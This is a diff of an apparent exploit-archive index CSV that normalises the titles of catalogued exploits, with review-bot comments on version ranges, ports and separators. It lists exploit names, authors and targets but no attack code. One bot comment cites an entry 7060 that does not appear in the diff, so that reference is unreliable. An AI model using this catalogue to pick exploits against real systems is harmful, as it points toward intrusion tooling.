diff --git a/files.csv b/files.csv
index 12ba444d1..765b7593f 100755
--- a/files.csv
+++ b/files.csv
@@ -134,11 +134,11 @@ id,file,description,date,author,platform,type,port
 138,platforms/php/webapps/138.pl,"PHP-NUKE version <= 6.9 - 'cid' SQL Injection Remote Exploit",2003-12-21,RusH,php,webapps,0
 139,platforms/linux/remote/139.c,"Cyrus IMSPD 1.7 - abook_dbname Remote Root Exploit",2003-12-27,SpikE,linux,remote,406
 140,platforms/linux/local/140.c,"Xsok 1.02 - ""-xsokdir"" Local Buffer Overflow Game Exploit",2004-01-02,c0wboy,linux,local,0
-141,platforms/linux/local/141.c,"Linux Kernel ""do_mremap"" Local Proof of Concept",2004-01-06,"Christophe Devine",linux,local,0
-142,platforms/linux/local/142.c,"Linux Kernel ""do_mremap"" Local Proof of Concept II",2004-01-07,"Christophe Devine",linux,local,0
+141,platforms/linux/local/141.c,"Linux Kernel <= 2.4.23, <= 2.6.0 - ""do_mremap"" Local Proof of Concept",2004-01-06,"Christophe Devine",linux,local,0
+142,platforms/linux/local/142.c,"Linux Kernel <= 2.4.23, <= 2.6.0 - ""do_mremap"" Local Proof of Concept (2)",2004-01-07,"Christophe Devine",linux,local,0
 143,platforms/linux/remote/143.c,"lftp <= 2.6.9 - Remote Stack based Overflow Exploit",2004-01-14,Li0n7,linux,remote,0
 144,platforms/linux/local/144.c,"SuSE linux 9.0 YaST config Skribt Local Exploit",2004-01-15,l0om,linux,local,0
-145,platforms/linux/local/145.c,"Linux Kernel 2.4.x mremap() bound checking Root Exploit",2004-01-15,"Paul Starzetz",linux,local,0
+145,platforms/linux/local/145.c,"Linux Kernel <= 2.4.23, <= 2.6.0 - mremap() Bound Checking Root Exploit",2004-01-15,"Paul Starzetz",linux,local,0
 146,platforms/multiple/dos/146.c,"OpenSSL ASN.1<= 0.9.6j <= 0.9.7b - Brute Forcer for Parsing Bugs",2003-10-09,"Bram Matthys",multiple,dos,0
 147,platforms/windows/dos/147.c,"Need for Speed 2 Remote Client Buffer Overflow Exploit",2004-01-23,"Luigi Auriemma",windows,dos,0
 148,platforms/windows/dos/148.sh,"MS Windows XP/2003 Samba Share Resource Exhaustion Exploit",2004-01-25,"Steve Ladjabi",windows,dos,0
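Review bot: Entry 145's new description widens the affected range from `2.4.x` to `<= 2.4.23, <= 2.6.0`, which the old text never claimed and nothing in this diff substantiates; the same range is copied from the 141/142 PoC entries, but 145 is a different author's exploit and may be 2.4-only. Confirm against the exploit's own header before committing the 2.6.0 bound, since this column is what people triage affected kernels from. If it is 2.4-only, keep the normalised form but the original scope: `"Linux Kernel <= 2.4.23 - mremap() Bound Checking Root Exploit"`.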
@@ -146,13 +146,13 @@ id,file,description,date,author,platform,type,port
 151,platforms/windows/remote/151.txt,"MS Internet Explorer URL Injection in History List (MS04-004)",2004-02-04,"Andreas Sandblad",windows,remote,0
 152,platforms/linux/local/152.c,"rsync <= 2.5.7 - Local stack overflow Root Exploit",2004-02-13,"Abhisek Datta",linux,local,0
 153,platforms/windows/dos/153.c,"MS Windows ASN.1 LSASS.EXE Remote Exploit (MS04-007)",2004-02-14,"Christophe Devine",windows,dos,0
-154,platforms/linux/local/154.c,"Linux Kernel ""mremap()""#2 Local Proof-of-concept",2004-02-18,"Christophe Devine",linux,local,0
+154,platforms/linux/local/154.c,"Linux Kernel <= 2.2.25, <= 2.4.24, <= 2.6.2 - ""mremap()"" Local Proof-of-Concept (2)",2004-02-18,"Christophe Devine",linux,local,0
 155,platforms/windows/remote/155.c,"GateKeeper Pro 4.7 web proxy Remote Buffer Overflow Exploit",2004-02-26,kralor,windows,remote,3128
 156,platforms/windows/remote/156.c,"PSOProxy 0.91 Remote Buffer Overflow Exploit (Win2k/XP)",2004-02-26,Rave,windows,remote,8080
 157,platforms/windows/remote/157.c,"IPSwitch IMail LDAP Daemon Remote Buffer Overflow Exploit",2004-02-27,"Johnny Cyberpunk",windows,remote,389
 158,platforms/windows/remote/158.c,"Serv-U FTPD 3.x/4.x/5.x (MDTM) Remote Overflow Exploit",2004-02-27,Sam,windows,remote,21
 159,platforms/windows/remote/159.c,"WFTPD Server <= 3.21 Remote Buffer Overflow Exploit",2004-02-29,rdxaxl,windows,remote,21
-160,platforms/linux/local/160.c,"Linux Kernel 2.x mremap missing do_munmap Exploit",2004-03-01,"Paul Starzetz",linux,local,0
+160,platforms/linux/local/160.c,"Linux Kernel <= 2.2.25, <= 2.4.24, <= 2.6.2 - ""mremap()"" Missing ""do_munmap"" Exploit",2004-03-01,"Paul Starzetz",linux,local,0
 161,platforms/windows/dos/161.c,"Red Faction <= 1.20 Server Reply Remote Buffer Overflow Exploit",2004-03-04,"Luigi Auriemma",windows,dos,0
 163,platforms/windows/remote/163.pl,"Eudora 6.0.3 Attachment Spoofing Exploit (windows)",2004-03-19,N/A,windows,remote,0
 164,platforms/windows/remote/164.c,"Foxmail 5.0 PunyLib.dll Remote Stack Overflow Exploit",2004-03-23,xfocus,windows,remote,0
@@ -251,7 +251,7 @@ id,file,description,date,author,platform,type,port
 264,platforms/novell/dos/264.c,"Novell BorderManager Enterprise Edition 3.5 - Denial of Service Exploit",2001-05-07,honoriak,novell,dos,0
 265,platforms/irix/local/265.sh,"IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) /usr/bin/lpstat Local Exploit",2001-05-07,LSD-PLaNET,irix,local,0
 266,platforms/windows/remote/266.c,"MS Windows 2000 sp1/sp2 isapi .printer Extension Overflow Exploit",2001-05-07,"Ryan Permeh",windows,remote,80
-268,platforms/windows/remote/268.c,"MS Windows 2000 sp1/sp2 isapi .printer Extension Overflow Exploit (2)",2001-05-08,"dark spyrit",windows,remote,80
+268,platforms/windows/remote/268.c,"MS Windows 2000 sp1/sp2 isapi - .printer Extension Overflow Exploit (2)",2001-05-08,"dark spyrit",windows,remote,80
 269,platforms/linux/remote/269.c,"BeroFTPD 1.3.4(1) - Remote Root Exploit (Linux x86)",2001-05-08,qitest1,linux,remote,21
 270,platforms/irix/local/270.sh,"IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) /usr/lib/print/netprint Local Exploit",2001-05-08,LSD-PLaNET,irix,local,0
 271,platforms/windows/local/271.c,"MS Windows Utility Manager Local SYSTEM Exploit (MS04-011)",2004-04-15,"Cesar Cerrudo",windows,local,0
@@ -261,7 +261,7 @@ id,file,description,date,author,platform,type,port
 275,platforms/windows/remote/275.c,"MS Windows IIS 5.0 SSL Remote buffer overflow Exploit (MS04-011)",2004-04-21,"Johnny Cyberpunk",windows,remote,443
 276,platforms/windows/dos/276.delphi,"MS Windows 2K/XP TCP Connection Reset Remote Attack Tool",2004-04-22,Aphex,windows,dos,0
 277,platforms/linux/remote/277.c,"BIND 8.2.x (TSIG) Remote Root Stack Overflow Exploit",2001-03-01,Gneisenau,linux,remote,53
-279,platforms/linux/remote/279.c,"BIND 8.2.x (TSIG) Remote Root Stack Overflow Exploit (2)",2001-03-01,LSD-PLaNET,linux,remote,53
+279,platforms/linux/remote/279.c,"BIND 8.2.x - (TSIG) Remote Root Stack Overflow Exploit (2)",2001-03-01,LSD-PLaNET,linux,remote,53
 280,platforms/solaris/remote/280.c,"BIND 8.2.x (TSIG) Remote Root Stack Overflow Exploit (3)",2001-03-01,LSD-PLaNET,solaris,remote,53
 281,platforms/tru64/local/281.c,"Tru64 UNIX 4.0g /usr/bin/at Local Root Exploit",2001-03-02,"Cody Tubbs",tru64,local,0
 282,platforms/linux/remote/282.c,"BIND 8.2.x (TSIG) Remote Root Stack Overflow Exploit (4)",2001-03-02,multiple,linux,remote,53
@@ -371,7 +371,7 @@ id,file,description,date,author,platform,type,port
 397,platforms/linux/remote/397.c,"WU-IMAP 2000.287(1-2) Remote Exploit",2002-06-25,Teso,linux,remote,143
 398,platforms/linux/remote/398.c,"rsync <= 2.5.1 - Remote Exploit",2002-01-01,Teso,linux,remote,873
 399,platforms/linux/remote/399.c,"rsync <= 2.5.1 - Remote Exploit (2)",2002-01-01,Teso,linux,remote,873
-400,platforms/linux/remote/400.c,"GV PostScript Viewer Remote Buffer overflow Exploit (2)",2004-08-18,infamous41md,linux,remote,0
+400,platforms/linux/remote/400.c,"GV PostScript Viewer - Remote Buffer overflow Exploit (2)",2004-08-18,infamous41md,linux,remote,0
 401,platforms/windows/local/401.c,"IPSwitch IMail Server <= 8.1 - Local Password Decryption Utility",2004-08-18,Adik,windows,local,0
 403,platforms/windows/local/403.c,"IPD (Integrity Protection Driver) Local Exploit",2004-08-18,N/A,windows,local,0
 404,platforms/linux/remote/404.pl,"PlaySMS <= 0.7 - SQL Injection Exploit",2004-08-19,"Noam Rathaus",linux,remote,0
@@ -489,11 +489,11 @@ id,file,description,date,author,platform,type,port
 635,platforms/php/webapps/635.txt,"miniBB - Input Validation Hole ('user')",2004-11-16,N/A,php,webapps,0
 636,platforms/windows/remote/636.c,"MiniShare Remote Buffer Overflow Exploit (c source)",2004-11-16,NoPh0BiA,windows,remote,80
 637,platforms/windows/remote/637.c,"MailCarrier 2.51 Remote Buffer Overflow Exploit",2004-11-16,NoPh0BiA,windows,remote,25
-638,platforms/windows/remote/638.py,"SLMail 5.5 POP3 PASS Buffer Overflow Exploit",2004-11-18,muts,windows,remote,110
+638,platforms/windows/remote/638.py,"SLMail 5.5 - POP3 PASS Buffer Overflow Exploit",2004-11-18,muts,windows,remote,110
 640,platforms/windows/remote/640.c,"MS Windows Compressed Zipped Folders Exploit (MS04-034)",2004-11-19,tarako,windows,remote,0
 641,platforms/windows/remote/641.txt,"MS Internet Explorer 6.0 SP2 File Download Security Warning Bypass",2004-11-19,cyber_flash,windows,remote,0
 642,platforms/cgi/webapps/642.pl,"TWiki 20030201 search.pm Remote Command Execution Exploit",2004-11-20,RoMaNSoFt,cgi,webapps,0
-643,platforms/windows/remote/643.c,"SLMAIL 5.5 POP3 PASS - Remote Buffer Overflow Exploit",2004-12-21,"Haroon Rashid Astwat",windows,remote,0
+643,platforms/windows/remote/643.c,"SLMail 5.5 - POP3 PASS Remote Buffer Overflow Exploit",2004-12-21,"Haroon Rashid Astwat",windows,remote,0
 644,platforms/windows/remote/644.pl,"DMS POP3 Server 1.5.3 build 37 - Buffer Overflow Exploit",2004-11-21,"Reed Arvin",windows,remote,110
 645,platforms/php/webapps/645.pl,"GFHost PHP GMail Remote Command Execution Exploit",2004-11-21,spabam,php,webapps,0
 646,platforms/windows/remote/646.c,"SLMail 5.5 - Remote Buffer Overflow Exploit",2004-12-22,"Ivan Ivanovic",windows,remote,0
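Review bot: While 643 is being rewritten to say `POP3 PASS`, its port column stays `0`, whereas 638 two rows above describes the same SLMail 5.5 POP3 PASS overflow and records `110`. If the exploit really targets the POP3 service as the new description states, the rewritten line should end `...,"Haroon Rashid Astwat",windows,remote,110` so port-based searches return both entries; if the port is unknown, leave it but don't let the description imply more than the record does. The rename itself (`SLMAIL` → `SLMail`, separator after the version) matches 646 and is fine.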
@@ -553,7 +553,7 @@ id,file,description,date,author,platform,type,port
 711,platforms/windows/remote/711.c,"CrystalFTP Pro 2.8 - Remote Buffer Overflow Exploit",2005-04-24,cybertronic,windows,remote,21
 712,platforms/linux/remote/712.c,"SHOUTcast DNAS/Linux 1.9.4 Format String Remote Exploit",2004-12-23,pucik,linux,remote,8000
 713,platforms/solaris/local/713.c,"Solaris 7/8/9 CDE LibDTHelp Local Buffer Overflow Exploit",2004-12-24,"Marco Ivaldi",solaris,local,0
-714,platforms/solaris/local/714.c,"Solaris 7/8/9 CDE LibDTHelp Local Buffer Overflow Exploit (2)",2004-12-24,"Marco Ivaldi",solaris,local,0
+714,platforms/solaris/local/714.c,"Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow Exploit (2)",2004-12-24,"Marco Ivaldi",solaris,local,0
 715,platforms/solaris/local/715.c,"Solaris 8/9 passwd circ() Local Root Exploit",2004-12-24,"Marco Ivaldi",solaris,local,0
 716,platforms/solaris/remote/716.c,"Solaris 2.5.1/2.6/7/8 rlogin /bin/login - Buffer Overflow Exploit (SPARC)",2004-12-24,"Marco Ivaldi",solaris,remote,513
 718,platforms/linux/local/718.c,"Linux Kernel 2.6.x chown() Group Ownership Alteration Exploit",2004-12-24,"Marco Ivaldi",linux,local,0
@@ -725,7 +725,7 @@ id,file,description,date,author,platform,type,port
 903,platforms/linux/remote/903.c,"Cyrus imapd 2.2.4 - 2.2.8 (imapmagicplus) Remote Exploit",2005-03-29,crash-x,linux,remote,143
 904,platforms/linux/dos/904.c,"Linux Kernel <= 2.6.10 Local Denial of Service Exploit",2005-03-29,ChoiX,linux,dos,0
 905,platforms/windows/local/905.c,"BakBone NetVault 6.x/7.x Local Stack Buffer Overflow Exploit",2005-04-01,class101,windows,local,0
-906,platforms/windows/remote/906.c,"BakBone NetVault 6.x/7.x Remote Heap Buffer Overflow Exploit (2)",2005-04-01,class101,windows,remote,20031
+906,platforms/windows/remote/906.c,"BakBone NetVault 6.x/7.x- Remote Heap Buffer Overflow Exploit (2)",2005-04-01,class101,windows,remote,20031
 907,platforms/php/webapps/907.pl,"phpBB <= 2.0.13 'downloads.php' mod Remote Exploit",2005-04-02,CereBrums,php,webapps,0
 908,platforms/windows/dos/908.c,"ArGoSoft FTP Server <= 1.4.2.8 - Denial of Service Exploit",2005-04-03,c0d3r,windows,dos,0
 909,platforms/windows/remote/909.cpp,"MS Windows (WINS) Remote Buffer Overflow Exploit (v.3)",2005-04-12,class101,windows,remote,42
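Review bot: The new 906 description is missing the space before the separator: `6.x/7.x- Remote Heap Buffer Overflow Exploit (2)`. Every other entry normalised in this commit uses ` - ` with a space on both sides, so the line should read `"BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow Exploit (2)"`. Tools that split on ` - ` to separate product from title will otherwise treat `6.x/7.x-` as the version for this one row.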
@@ -849,7 +849,7 @@ id,file,description,date,author,platform,type,port
 1037,platforms/multiple/dos/1037.c,"Tcpdump bgp_update_print Remote Denial of Service Exploit",2005-06-09,simon,multiple,dos,0
 1038,platforms/linux/remote/1038.c,"GNU Mailutils imap4d 0.5 < 0.6.90 Remote Format String Exploit",2005-06-10,qobaiashi,linux,remote,143
 1039,platforms/cgi/webapps/1039.pl,"Webhints <= 1.03 Remote Command Execution Exploit (perl code) (1)",2005-06-11,Alpha_Programmer,cgi,webapps,0
-1040,platforms/cgi/webapps/1040.c,"Webhints <= 1.03 Remote Command Execution Exploit (c code) (2)",2005-06-11,Alpha_Programmer,cgi,webapps,0
+1040,platforms/cgi/webapps/1040.c,"Webhints <= 1.03 - Remote Command Execution Exploit (c code) (2)",2005-06-11,Alpha_Programmer,cgi,webapps,0
 1041,platforms/cgi/webapps/1041.pl,"Webhints <= 1.03 Remote Command Execution Exploit (perl code) (3)",2005-06-11,MadSheep,cgi,webapps,0
 1043,platforms/osx/local/1043.c,"Mac OS X 10.4 launchd Race Condition Exploit",2005-06-14,intropy,osx,local,0
 1044,platforms/aix/local/1044.c,"AIX 5.2 netpmon Local Elevated Privileges Exploit",2005-06-14,intropy,aix,local,0
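Review bot: Only the middle entry of the Webhints trio gets the ` - ` separator; 1039 and 1041 (context rows, same product, same `<= 1.03` bound, same day) keep the old form, so the family now renders inconsistently in any listing sorted by description. The pattern across this diff appears to be "normalise only `(2)`-suffixed rows", which is defensible but should be stated in the commit message; otherwise touch the siblings in the same pass, e.g. `"Webhints <= 1.03 - Remote Command Execution Exploit (perl code) (1)"` and `... (perl code) (3)"`.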
@@ -881,7 +881,7 @@ id,file,description,date,author,platform,type,port
 1071,platforms/asp/webapps/1071.pl,"ASPNuke <= 0.80 (comment_post.asp) SQL Injection Exploit",2005-06-27,"Alberto Trivero",asp,webapps,0
 1072,platforms/multiple/dos/1072.cpp,"Stream / Raped Denial of Service Attack (win version)",2005-06-27,"Marco Del Percio",multiple,dos,0
 1073,platforms/solaris/local/1073.c,"Solaris 9 / 10 ld.so Local Root Exploit (1)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0
-1074,platforms/solaris/local/1074.c,"Solaris 9 / 10 ld.so Local Root Exploit (2)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0
+1074,platforms/solaris/local/1074.c,"Solaris 9 / 10 - ld.so Local Root Exploit (2)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0
 1075,platforms/windows/remote/1075.c,"MS Windows Message Queuing BoF Universal Exploit (MS05-017) (v.0.3)",2005-06-29,houseofdabus,windows,remote,2103
 1076,platforms/php/webapps/1076.py,"phpBB 2.0.15 (highlight) Remote PHP Code Execution",2005-06-29,rattle,php,webapps,0
 1077,platforms/php/webapps/1077.pl,"Wordpress <= 1.5.1.2 xmlrpc Interface SQL Injection Exploit",2005-06-30,"James Bercegay",php,webapps,0
@@ -998,7 +998,7 @@ id,file,description,date,author,platform,type,port
 1199,platforms/windows/dos/1199.c,"BNBT BitTorrent EasyTracker <= 7.7r3 Denial of Service Exploit",2005-09-06,Sowhat,windows,dos,0
 1200,platforms/php/webapps/1200.php,"PBLang <= 4.65 Remote Command Execution Exploit",2005-09-07,rgod,php,webapps,0
 1201,platforms/windows/remote/1201.pl,"FTP Internet Access Manager <= 1.2 Command Execution Exploit",2005-09-07,basher13,windows,remote,0
-1202,platforms/php/webapps/1202.php,"PBLang <= 4.65 Remote Command Execution Exploit (2)",2005-09-07,RusH,php,webapps,0
+1202,platforms/php/webapps/1202.php,"PBLang <= 4.65 - Remote Command Execution Exploit (2)",2005-09-07,RusH,php,webapps,0
 1204,platforms/multiple/dos/1204.html,"Mozilla Products (Host:) Buffer Overflow Denial of Service String",2005-09-09,"Tom Ferris",multiple,dos,0
 1207,platforms/php/webapps/1207.php,"Class-1 Forum <= 0.24.4 - Remote Code Execution Exploit",2005-09-09,rgod,php,webapps,0
 1208,platforms/php/webapps/1208.pl,"phpMyFamily <= 1.4.0 - SQL Injection Exploit",2005-03-27,basher13,php,webapps,0
@@ -1045,7 +1045,7 @@ id,file,description,date,author,platform,type,port
 1252,platforms/asp/webapps/1252.htm,"MuOnline Loopholes Web Server (pkok.asp) SQL Injection Exploit",2005-10-15,nukedx,asp,webapps,0
 1253,platforms/multiple/dos/1253.html,"Mozilla (Firefox <= 1.0.7) (Thunderbird <= 1.0.6) Denial of Service Exploit",2005-10-16,posidron,multiple,dos,0
 1254,platforms/multiple/dos/1254.html,"Opera <= 8.02 Remote Denial of Service Exploit",2005-10-16,posidron,multiple,dos,0
-1255,platforms/windows/dos/1255.html,"Opera <= 8.02 Remote Denial of Service Exploit (2)",2005-10-16,posidron,windows,dos,0
+1255,platforms/windows/dos/1255.html,"Opera <= 8.02 - Remote Denial of Service Exploit (2)",2005-10-16,posidron,windows,dos,0
 1256,platforms/multiple/dos/1256.pl,"Lynx <= 2.8.6dev.13 Remote Buffer Overflow Exploit (PoC)",2005-10-17,"Ulf Harnhammar",multiple,dos,0
 1257,platforms/multiple/dos/1257.html,"Mozilla (Firefox <= 1.0.7) (Mozilla <= 1.7.12) Denial of Service Exploit",2005-10-17,Kubbo,multiple,dos,0
 1258,platforms/linux/remote/1258.php,"e107 <= 0.6172 - (resetcore.php) Remote SQL Injection Exploit",2005-10-18,rgod,linux,remote,0
@@ -1939,7 +1939,7 @@ id,file,description,date,author,platform,type,port
 2243,platforms/php/webapps/2243.php,"Simple Machines Forum <= 1.1 rc2 Lock Topics Remote Exploit",2006-08-22,rgod,php,webapps,0
 2244,platforms/multiple/dos/2244.pl,"Mozilla Firefox <= 1.5.0.6 (FTP Request) Remote Denial of Service Exploit",2006-08-22,"Tomas Kempinsky",multiple,dos,0
 2245,platforms/windows/dos/2245.pl,"MDaemon POP3 Server < 9.06 (USER) Remote Buffer Overflow PoC",2006-08-22,"Leon Juranic",windows,dos,0
-2246,platforms/hardware/dos/2246.cpp,"2wire Modems/Routers CRLF Denial of Service Exploit",2006-08-22,preth00nker,hardware,dos,0
+2246,platforms/hardware/dos/2246.cpp,"2wire Modems/Routers CRLF - Denial of Service Exploit",2006-08-22,preth00nker,hardware,dos,0
 2247,platforms/php/webapps/2247.php,"MercuryBoard <= 1.1.4 (User-Agent) Remote SQL Injection Exploit",2006-08-23,rgod,php,webapps,0
 2248,platforms/php/webapps/2248.pl,"phpBB All Topics Mod <= 1.5.0 (start) Remote SQL Injection Exploit",2006-08-23,SpiderZ,php,webapps,0
 2249,platforms/php/webapps/2249.txt,"pSlash 0.7 (lvc_include_dir) Remote File Include Vulnerability",2006-08-23,"Mehmet Ince",php,webapps,0
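Review bot: In the new 2246 line the separator lands after `CRLF`, so `CRLF` now reads as part of the product name: `2wire Modems/Routers CRLF - Denial of Service Exploit`. CRLF names the injection vector, not the device, and the separator belongs after the product, the way 7060 later in this diff does it (`2WIRE DSL Router (xslt) - Denial of Service Vulnerability`). Suggested: `"2wire Modems/Routers - (CRLF) Denial of Service Exploit"`.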
@@ -3072,7 +3072,7 @@ id,file,description,date,author,platform,type,port
 3405,platforms/multiple/remote/3405.txt,"PHP 4.4.3 - 4.4.6 phpinfo() Remote XSS Vulnerability",2007-03-04,"Stefan Esser",multiple,remote,0
 3406,platforms/php/webapps/3406.pl,"News-Letterman 1.1 (eintrag.php sqllog) Remote File Include Exploit",2007-03-04,bd0rk,php,webapps,0
 3407,platforms/multiple/dos/3407.c,"Asterisk <= 1.2.15 / 1.4.0 pre-auth Remote Denial of Service Exploit",2007-03-04,fbffff,multiple,dos,0
-3408,platforms/php/webapps/3408.pl,"AJ Auction Pro All Versions (subcat.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0
+3408,platforms/php/webapps/3408.pl,"AJ Auction Pro All Versions - (subcat.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0
 3409,platforms/php/webapps/3409.htm,"AJ Dating 1.0 (view_profile.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0
 3410,platforms/php/webapps/3410.htm,"AJ Classifieds 1.0 (postingdetails.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0
 3411,platforms/php/webapps/3411.pl,"AJ Forum 1.0 (topic_title.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0
@@ -4203,7 +4203,7 @@ id,file,description,date,author,platform,type,port
 4557,platforms/php/webapps/4557.txt,"Simple PHP Blog (sphpblog) <= 0.5.1 - Multiple Vulnerabilities",2007-10-22,DarkFig,php,webapps,0
 4558,platforms/php/webapps/4558.txt,"InstaGuide Weather Script (index.php) 1.0 - Local File Inclusion Vulnerability",2007-10-22,"BorN To K!LL",php,webapps,0
 4559,platforms/multiple/dos/4559.txt,"Mozilla Firefox <= 2.0.0.7 - Remote Denial of Service Exploit",2007-10-22,BugReport.IR,multiple,dos,0
-4560,platforms/multiple/dos/4560.pl,"DNS Recursion bandwidth amplification Denial of Service PoC",2007-10-23,ShadowHatesYou,multiple,dos,0
+4560,platforms/multiple/dos/4560.pl,"DNS Recursion Bandwidth Amplification - Denial of Service PoC",2007-10-23,ShadowHatesYou,multiple,dos,0
 4561,platforms/php/webapps/4561.txt,"Flatnuke 3 Remote Command Execution / Privilege Escalation",2007-10-23,KiNgOfThEwOrLd,php,webapps,0
 4562,platforms/php/webapps/4562.txt,"Flatnuke 3 Remote Cookie Manipoulation / Privilege Escalation",2007-10-23,KiNgOfThEwOrLd,php,webapps,0
 4563,platforms/php/webapps/4563.txt,"php-nuke platinum 7.6.b.5 - Remote File Inclusion Vulnerability",2007-10-23,BiNgZa,php,webapps,0
@@ -4479,7 +4479,7 @@ id,file,description,date,author,platform,type,port
 4836,platforms/php/webapps/4836.txt,"samPHPweb (songinfo.php) Remote SQL Injection Vulnerability",2008-01-05,BackDoor,php,webapps,0
 4837,platforms/php/webapps/4837.pl,"ClipShare 2.6 - Remote User Password Change Exploit",2008-01-05,Pr0metheuS,php,webapps,0
 4838,platforms/php/webapps/4838.txt,"snetworks php classifieds 5.0 - Remote File Inclusion Vulnerability",2008-01-05,Crackers_Child,php,webapps,0
-4839,platforms/windows/local/4839.pl,"CoolPlayer 2.17 .m3u Playlist Stack Overflow Exploit",2008-01-05,Trancek,windows,local,0
+4839,platforms/windows/local/4839.pl,"CoolPlayer 2.17 - .m3u Playlist Stack Overflow Exploit",2008-01-05,Trancek,windows,local,0
 4840,platforms/php/webapps/4840.php,"Tribisur <= 2.0 - Remote SQL Injection Exploit",2008-01-05,x0kster,php,webapps,0
 4841,platforms/php/webapps/4841.txt,"Invision Power Board <= 2.1.7 ACTIVE XSS/SQL Injection Exploit",2008-01-05,"Eugene Minaev",php,webapps,0
 4842,platforms/php/webapps/4842.pl,"NetRisk 1.9.7 (change_submit.php) Remote Password Change Exploit",2008-01-05,Cod3rZ,php,webapps,0
@@ -5215,7 +5215,7 @@ id,file,description,date,author,platform,type,port
 5588,platforms/php/webapps/5588.php,"QuickUpCMS Multiple Remote SQL Injection Vulnerabilities Exploit",2008-05-11,Lidloses_Auge,php,webapps,0
 5589,platforms/php/webapps/5589.php,"Vortex CMS (index.php pageid) Blind SQL Injection Exploit",2008-05-11,Lidloses_Auge,php,webapps,0
 5590,platforms/php/webapps/5590.txt,"AJ Article 1.0 (featured_article.php) Remote SQL Injection Vulnerability",2008-05-12,t0pP8uZz,php,webapps,0
-5591,platforms/php/webapps/5591.txt,"AJ Auction <= 6.2.1 (classifide_ad.php) SQL Injection Vulnerability",2008-05-12,t0pP8uZz,php,webapps,0
+5591,platforms/php/webapps/5591.txt,"AJ Auction <= 6.2.1 - (classifide_ad.php) SQL Injection Vulnerability",2008-05-12,t0pP8uZz,php,webapps,0
 5592,platforms/php/webapps/5592.txt,"AJ Classifieds 2008 (index.php) Remote SQL Injection Vulnerability",2008-05-12,t0pP8uZz,php,webapps,0
 5594,platforms/php/webapps/5594.txt,"ZeusCart <= 2.0 (category_list.php) SQL Injection Vulnerability",2008-05-12,t0pP8uZz,php,webapps,0
 5595,platforms/php/webapps/5595.txt,"clanlite 2.x (SQL Injection/xss) Multiple Vulnerabilities",2008-05-12,ZoRLu,php,webapps,0
@@ -5486,7 +5486,7 @@ id,file,description,date,author,platform,type,port
 5864,platforms/php/webapps/5864.txt,"Orlando CMS 0.6 - Remote File Inclusion Vulnerabilities",2008-06-19,Ciph3r,php,webapps,0
 5865,platforms/php/webapps/5865.txt,"CaupoShop Classic 1.3 (saArticle[ID]) Remote SQL Injection Vulnerability",2008-06-19,N/A,php,webapps,0
 5866,platforms/php/webapps/5866.txt,"Lotus Core CMS 1.0.1 - Remote File Inclusion Vulnerabilities",2008-06-19,Ciph3r,php,webapps,0
-5867,platforms/php/webapps/5867.txt,"AJ Auction Web 2.0 (cate_id) SQL Injection Vulnerability",2008-06-19,"Hussin X",php,webapps,0
+5867,platforms/php/webapps/5867.txt,"AJ Auction Web 2.0 - (cate_id) SQL Injection Vulnerability",2008-06-19,"Hussin X",php,webapps,0
 5868,platforms/php/webapps/5868.txt,"AJ Auction 1.0 - (id) Remote SQL Injection Vulnerability",2008-06-19,"Hussin X",php,webapps,0
 5869,platforms/php/webapps/5869.txt,"virtual support office-xp <= 3.0.29 Multiple Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0
 5870,platforms/php/webapps/5870.txt,"gl-sh deaf forum <= 6.5.5 - Multiple Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0
@@ -5768,7 +5768,7 @@ id,file,description,date,author,platform,type,port
 6154,platforms/php/webapps/6154.txt,"ViArt Shop <= 3.5 (category_id) Remote SQL Injection Vulnerability",2008-07-28,"GulfTech Security",php,webapps,0
 6155,platforms/hardware/remote/6155.c,"Cisco IOS 12.3(18) FTP Server - Remote Exploit (attached to gdb)",2008-07-29,"Andy Davis",hardware,remote,0
 6156,platforms/php/webapps/6156.txt,"Minishowcase 09b136 (lang) Local File Inclusion Vulnerability",2008-07-29,DSecRG,php,webapps,0
-6157,platforms/windows/local/6157.pl,"CoolPlayer m3u File Local Buffer Overflow Exploit",2008-07-29,"Guido Landi",windows,local,0
+6157,platforms/windows/local/6157.pl,"CoolPlayer - m3u File Local Buffer Overflow Exploit",2008-07-29,"Guido Landi",windows,local,0
 6158,platforms/php/webapps/6158.pl,"e107 Plugin BLOG Engine 2.2 - Blind SQL Injection Exploit",2008-07-29,"Virangar Security",php,webapps,0
 6159,platforms/php/webapps/6159.txt,"Gregarius <= 0.5.4 rsargs[] Remote SQL Injection Vulnerability",2008-07-29,"GulfTech Security",php,webapps,0
 6160,platforms/php/webapps/6160.txt,"PHP Hosting Directory 2.0 (admin.php rd) RFI Vulnerability",2008-07-29,RoMaNcYxHaCkEr,php,webapps,0
@@ -6120,7 +6120,7 @@ id,file,description,date,author,platform,type,port
 6547,platforms/php/webapps/6547.txt,"Ol Bookmarks Manager 0.7.5 RFI / LFI / SQL Injection Vulnerabilities",2008-09-24,GoLd_M,php,webapps,0
 6548,platforms/windows/remote/6548.html,"BurnAware NMSDVDXU ActiveX Remote Arbitrary File Creation/Execution",2008-09-24,shinnai,windows,remote,0
 6549,platforms/php/webapps/6549.txt,"Jetik Emlak ESA 2.0 - Multiple Remote SQL Injection Vulnerabilities",2008-09-24,ZoRLu,php,webapps,0
-6550,platforms/php/webapps/6550.txt,"AJ Auction Pro Platinum Skin #2 (detail.php item_id) SQL Injection Vuln",2008-09-24,GoLd_M,php,webapps,0
+6550,platforms/php/webapps/6550.txt,"AJ Auction Pro Platinum Skin - (detail.php item_id) SQL Injection Vuln",2008-09-24,GoLd_M,php,webapps,0
 6551,platforms/php/webapps/6551.txt,"emergecolab 1.0 (sitecode) Local File Inclusion Vulnerability",2008-09-24,dun,php,webapps,0
 6552,platforms/php/webapps/6552.txt,"mailwatch <= 1.0.4 (docs.php doc) Local File Inclusion Vulnerability",2008-09-24,dun,php,webapps,0
